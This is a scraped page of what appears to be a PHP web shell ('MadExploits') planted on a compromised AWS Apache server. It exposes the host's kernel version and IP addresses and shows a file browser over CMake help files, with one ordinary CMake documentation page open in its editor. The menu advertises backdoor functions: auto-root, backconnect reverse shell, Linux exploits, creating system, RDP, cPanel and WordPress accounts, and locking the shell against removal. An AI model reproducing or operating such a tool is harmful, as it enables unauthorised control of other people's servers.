Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.221.103
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
cmake-3.16 /
Help /
prop_gbl /
[ HOME SHELL ]
Name
Size
Permission
Action
ALLOW_DUPLICATE_CUSTOM_TARGETS...
1015
B
-rw-r--r--
AUTOGEN_SOURCE_GROUP.rst
616
B
-rw-r--r--
AUTOGEN_TARGETS_FOLDER.rst
423
B
-rw-r--r--
AUTOMOC_SOURCE_GROUP.rst
232
B
-rw-r--r--
AUTOMOC_TARGETS_FOLDER.rst
500
B
-rw-r--r--
AUTORCC_SOURCE_GROUP.rst
232
B
-rw-r--r--
CMAKE_CXX_KNOWN_FEATURES.rst
9.86
KB
-rw-r--r--
CMAKE_C_KNOWN_FEATURES.rst
1.01
KB
-rw-r--r--
CMAKE_ROLE.rst
359
B
-rw-r--r--
DEBUG_CONFIGURATIONS.rst
534
B
-rw-r--r--
DISABLED_FEATURES.rst
455
B
-rw-r--r--
ECLIPSE_EXTRA_CPROJECT_CONTENT...
495
B
-rw-r--r--
ECLIPSE_EXTRA_NATURES.rst
342
B
-rw-r--r--
ENABLED_FEATURES.rst
447
B
-rw-r--r--
ENABLED_LANGUAGES.rst
155
B
-rw-r--r--
FIND_LIBRARY_USE_LIB32_PATHS.r...
459
B
-rw-r--r--
FIND_LIBRARY_USE_LIB64_PATHS.r...
431
B
-rw-r--r--
FIND_LIBRARY_USE_LIBX32_PATHS....
465
B
-rw-r--r--
FIND_LIBRARY_USE_OPENBSD_VERSI...
394
B
-rw-r--r--
GENERATOR_IS_MULTI_CONFIG.rst
370
B
-rw-r--r--
GLOBAL_DEPENDS_DEBUG_MODE.rst
297
B
-rw-r--r--
GLOBAL_DEPENDS_NO_CYCLES.rst
428
B
-rw-r--r--
IN_TRY_COMPILE.rst
192
B
-rw-r--r--
JOB_POOLS.rst
1.13
KB
-rw-r--r--
PACKAGES_FOUND.rst
226
B
-rw-r--r--
PACKAGES_NOT_FOUND.rst
242
B
-rw-r--r--
PREDEFINED_TARGETS_FOLDER.rst
362
B
-rw-r--r--
REPORT_UNDEFINED_PROPERTIES.rs...
295
B
-rw-r--r--
RULE_LAUNCH_COMPILE.rst
433
B
-rw-r--r--
RULE_LAUNCH_CUSTOM.rst
428
B
-rw-r--r--
RULE_LAUNCH_LINK.rst
432
B
-rw-r--r--
RULE_MESSAGES.rst
605
B
-rw-r--r--
TARGET_ARCHIVES_MAY_BE_SHARED_...
225
B
-rw-r--r--
TARGET_MESSAGES.rst
745
B
-rw-r--r--
TARGET_SUPPORTS_SHARED_LIBS.rs...
340
B
-rw-r--r--
USE_FOLDERS.rst
393
B
-rw-r--r--
XCODE_EMIT_EFFECTIVE_PLATFORM_...
949
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : JOB_POOLS.rst
JOB_POOLS --------- Ninja only: List of available pools. A pool is a named integer property and defines the maximum number of concurrent jobs which can be started by a rule assigned to the pool. The :prop_gbl:`JOB_POOLS` property is a semicolon-separated list of pairs using the syntax NAME=integer (without a space after the equality sign). For instance: .. code-block:: cmake set_property(GLOBAL PROPERTY JOB_POOLS two_jobs=2 ten_jobs=10) Defined pools could be used globally by setting :variable:`CMAKE_JOB_POOL_COMPILE` and :variable:`CMAKE_JOB_POOL_LINK` or per target by setting the target properties :prop_tgt:`JOB_POOL_COMPILE` and :prop_tgt:`JOB_POOL_LINK`. :command:`Custom commands <add_custom_command>` and :command:`custom targets <add_custom_target>` can specify pools using the option ``JOB_POOL``. Using a pool that is not defined by :prop_gbl:`JOB_POOLS` causes an error by ninja at build time. If not set, this property uses the value of the :variable:`CMAKE_JOB_POOLS` variable. Build targets provided by CMake that are meant for individual interactive use, such as ``install``, are placed in the ``console`` pool automatically.
Close